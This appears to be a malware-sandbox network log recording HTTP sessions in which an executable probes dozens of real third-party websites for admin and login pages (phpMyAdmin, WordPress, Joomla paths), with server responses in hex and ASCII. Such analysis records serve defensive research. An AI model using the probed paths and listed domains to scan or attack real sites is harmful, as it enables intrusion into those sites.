                                                                                                                                                                                                    111192.168.2.45671676.223.105.230806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.293162107 CET230OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: saudi-jamac.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.394283056 CET366INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    location: https://saudi-jamac.com/phpmyadmin/
                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                    server: DPS/2.0.0+sha-3210b49
                                                                                                                                                                                                    x-version: 3210b49
                                                                                                                                                                                                    x-siteid: us-east-1
                                                                                                                                                                                                    set-cookie: dps_site_id=us-east-1; path=/
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    keep-alive: timeout=5
                                                                                                                                                                                                    transfer-encoding: chunked
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    112192.168.2.456704192.96.211.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.314122915 CET244OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.prettypollycleaning.ae
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.431220055 CET411INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Content-Length: 212
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /administrator/ was not found on this server.</p></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.545646906 CET312OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.prettypollycleaning.ae
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://www.prettypollycleaning.ae/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.660378933 CET420INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Content-Length: 221
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /administrator/index.php was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    113192.168.2.456752172.67.132.45806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.325072050 CET228OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.460480928 CET718INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                    Expires: Sun, 26 Nov 2023 06:59:32 GMT
                                                                                                                                                                                                    Location: https://esoft.academy/phpmyadmin/
                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fERLt40YJa3suL%2B73Kq6SPGXb7Vk1t5izECDSnK%2BjkqkDDGrNvpcKVUZxjoXcZiKdgHOilXai7eECOZCkk0FWpUn4YQpt2cCEx4Wtd1WgmNk5KMtEOVx%2F4f41GzkBhBo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 82bfe7eb4e55397a-IAD
                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    114192.168.2.456441148.66.138.193806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.330780029 CET230OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: octetpowers.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.698513985 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                                    Connection: Upgrade
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                    Expires: 0
                                                                                                                                                                                                    Content-Length: 1699
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container te
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.698527098 CET758INData Raw: 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 30 30 22 20 77 69 64 74 68 3d 22 31 30 30 22 3e 0a 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 35 30 2c 32 35
                                                                                                                                                                                                    Data Ascii: xt-center" id="error"> <svg height="100" width="100"> <polygon points="50,25 17,80 82,80" stroke-linejoin="round" style="fill:none;stroke:#ff8a00;stroke-width:8" /> <text x="42" y="74" fill="#ff8a00" font-family="sans-serif" font-wei
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.699909925 CET272OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: octetpowers.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://octetpowers.in/wp-login.php


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    115192.168.2.456830192.124.249.13806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.376838923 CET229OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: coimbrausa.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    116192.168.2.45678534.136.104.255806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.376970053 CET228OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.516071081 CET372INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 146
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Keep-Alive: timeout=20
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    117192.168.2.456637133.130.97.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.380707979 CET225OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: digdig.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.640197039 CET489INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                                                                                    Content-Length: 209
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    118192.168.2.45677435.214.252.247806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.386612892 CET236OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: locandafrancigena.it
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.569340944 CET609INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    SG-Captcha: challenge
                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                    Cache-Control: no-store,no-cache,max-age=0
                                                                                                                                                                                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                    X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 25 8e 4d 0e 83 20 18 44 af 42 48 da 9d 80 d6 88 3f 60 77 bd 07 41 14 23 22 c5 cf 9a de be b4 5d 4c 66 31 93 bc 27 2c ac ae 17 d6 a8 a1 17 6e f6 0b 8a c6 49 3c eb cd 63 64 a3 19 25 1e 14 a8 b6 c3 bd 58 0d 28 64 01 42 66 9e c7 fc 92 38 cd d1 ec 16 a3 f4 06 e3 41 62 d6 51 72 1a e7 b2 c5 6f a7 a7 fb a4 55 00 6d 15 bd 47 79 29 1e 67 c8 dc 36 cd 9e 04 1b ae 6f 39 1e ba ad 1b 92 97 29 35 a9 58 9b 73 c6 1a 5e df 78 41 ca 8a 27 24 fd 32 53 fd fd e8 4f f6 03 88 cf 83 fc b3 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: a9%M DBH?`wA#"]Lf1',nI<cd%X(dBf8AbQroUmGy)g6o9)5Xs^xA'$2SO0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.572623014 CET284OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: locandafrancigena.it
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://locandafrancigena.it/wp-login.php
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.755048990 CET608INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    SG-Captcha: challenge
                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                    Cache-Control: no-store,no-cache,max-age=0
                                                                                                                                                                                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                    X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 61 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 25 8e 4d 0e 83 20 14 84 af 62 48 da 9d 80 da fa 0b 76 d7 7b 10 7c 16 22 a2 c5 67 4d 6f 5f da 2e 26 33 c9 4c f2 8d 30 38 bb 5e 18 50 43 2f 9c f5 53 12 c0 49 62 f5 e2 49 62 02 8c 92 0c 0a 55 db 91 5e cc 80 2a 31 88 6b 0a cf dd be 24 89 75 80 cd 90 24 ae 11 3c 4a c2 3b 46 0f 70 2e 9d fc 72 78 b6 3d b4 5a 51 1b c5 6e 41 9e f2 fb b1 a6 6a 98 ad 8f f1 fc 96 e3 ae db ba a1 d9 25 aa a6 25 6f b3 8a f3 a6 aa 8b 2a a7 e5 b5 88 44 f6 45 46 fb df 63 bf af 1f 03 6c 6e 64 b2 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: a8%M bHv{|"gMo_.&3L08^PC/SIbIbU^*1k$u$<J;Fp.rx=ZQnAj%%o*DEFclnd0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    119192.168.2.456806178.32.41.233806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.393627882 CET227OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: rochester-gauges.be
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.565843105 CET546INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:55:03 GMT
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Length: 315
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    120192.168.2.45673981.169.145.74806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.403398991 CET233OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: awb-apparatebau.de
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.604788065 CET409INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache/2.4.58 (Unix)
                                                                                                                                                                                                    Content-Length: 196
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
